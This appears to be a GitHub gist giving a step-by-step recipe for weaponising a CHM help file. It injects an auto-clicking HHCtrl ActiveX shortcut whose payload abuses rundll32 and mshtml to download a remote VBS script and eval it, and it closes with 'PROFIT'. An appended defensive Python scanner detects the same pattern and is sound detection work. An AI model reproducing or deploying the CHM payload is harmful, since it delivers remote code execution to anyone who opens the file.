Created February 6, 2018 13:52
mgeeky created this gist Feb 6, 2018.
## Procedure for generating Malicious CHM file

- **Step 0:** Download and install [**Microsoft HTML Help Workshop and Documentation**](https://www.microsoft.com/en-us/download/details.aspx?id=21138)
- **Step 1:** Obtain a valid CHM file and unpack it using 7-zip
- **Step 2:** Find an entry-point HTML file within the "_docs_" directory and insert the following code into its `<body>` section:

```
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',cmd.exe,/c copy /Y C:\Windows\system32\rundll32.exe %TEMP%\out.exe > nul && %TEMP%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8000/test.vbs",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);}'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
```

- **Step 3:** Prepare a `Project.hpp` file with contents like the ones below:

```
[OPTIONS]
Contents file=<PATH-TO-UNPACKED-CHM-DIRECTORY>\Table of Contents.hhc

[FILES]
<PATH-TO-UNPACKED-CHM-DIRECTORY>\docs\Malicious-File.htm
```

Add every file needed by that CHM to the `FILES` section. Remember to also include the previously modified malicious HTM file.

- **Step 4:** Compile the project from within the CHM directory using the `hhc.exe` compiler:

```
<PATH-TO-UNPACKED-CHM-DIRECTORY> "C:\Program Files (x86)\HTML Help Workshop\hhc.exe" Project.hpp
Microsoft HTML Help Compiler 4.74.8702

Compiling <PATH-TO-UNPACKED-CHM-DIRECTORY>\Project.chm

Compile time: 0 minutes, 1 second
353 Topics
7,208 Local links
187 Internet links
2 Graphics

Created <PATH-TO-UNPACKED-CHM-DIRECTORY>\Project.chm, 817,791 bytes
Compression decreased file by 2,091,702 bytes.
```

- **Step 5:** PROFIT.
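As an added defender-side example (not part of this gist), the scanner below inspects HTML topic files, such as those unpacked from a CHM in Step 1, for the pattern the procedure relies on: an `<OBJECT>` using the HTML Help ActiveX control CLSID shown in Step 2, a `Command` parameter set to `ShortCut`, and an inline `x.Click()` that fires it without user interaction. The function names and the sample HTML strings are my own constructions; the suspicious sample uses a harmless `notepad.exe` shortcut rather than the payload from the gist.

```python
import glob
import os
import re
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control (HHCtrl.ocx) used in Step 2 above.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"


class _ObjectParamCollector(HTMLParser):
    """Collect every <OBJECT> tag together with the <PARAM> tags nested in it."""

    def __init__(self):
        super().__init__()
        self.objects = []      # each entry: {"classid": str, "params": {name: value}}
        self._current = None

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; values keep their case.
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "object":
            self._current = {"classid": attrs.get("classid", "").lower(), "params": {}}
            self.objects.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current["params"][attrs.get("name", "").lower()] = attrs.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None


def find_shortcut_objects(html):
    """Return (classid, item1) for each HHCtrl object configured with Command=ShortCut.

    item1 is the ',program,arguments' string the control would hand to the shell
    when the object is clicked, so it is the value an analyst wants to see.
    """
    parser = _ObjectParamCollector()
    parser.feed(html)
    findings = []
    for obj in parser.objects:
        if HHCTRL_CLSID not in obj["classid"]:
            continue
        if obj["params"].get("command", "").strip().lower() != "shortcut":
            continue
        findings.append((obj["classid"], obj["params"].get("item1", "")))
    return findings


def is_auto_clicked(html):
    """True if inline script calls .Click() on an element, i.e. the shortcut
    fires as soon as the topic is rendered (the <SCRIPT> block in Step 2)."""
    return re.search(r"\b\w+\.Click\s*\(\s*\)", html, re.IGNORECASE) is not None


def scan(html):
    """Summarise one HTML topic file: shortcut objects found and whether one auto-fires."""
    hits = find_shortcut_objects(html)
    return {"shortcut_objects": hits, "auto_click": bool(hits) and is_auto_clicked(html)}


def scan_directory(path):
    """Scan every .htm/.html file under an unpacked CHM directory; return {file: summary}."""
    results = {}
    for pattern in ("**/*.htm", "**/*.html"):
        for name in glob.glob(os.path.join(path, pattern), recursive=True):
            with open(name, "r", encoding="utf-8", errors="replace") as fh:
                summary = scan(fh.read())
            if summary["shortcut_objects"]:
                results[name] = summary
    return results


# Constructed sample inputs (not taken from any real CHM).
BENIGN_HTML = "<html><body><h1>Help topic</h1><p>Nothing unusual here.</p></body></html>"
SUSPICIOUS_HTML = """<html><body>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',notepad.exe,'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>x.Click();</SCRIPT>
</body></html>"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_HTML), ("suspicious", SUSPICIOUS_HTML)):
        print(label, scan(doc))
```

Point `scan_directory()` at the directory produced by unpacking a CHM with 7-zip to triage every topic file at once; a hit with `auto_click` set is the combination this gist describes, while a ShortCut object that needs a real click is still worth reviewing since `Item1` names the program that would run.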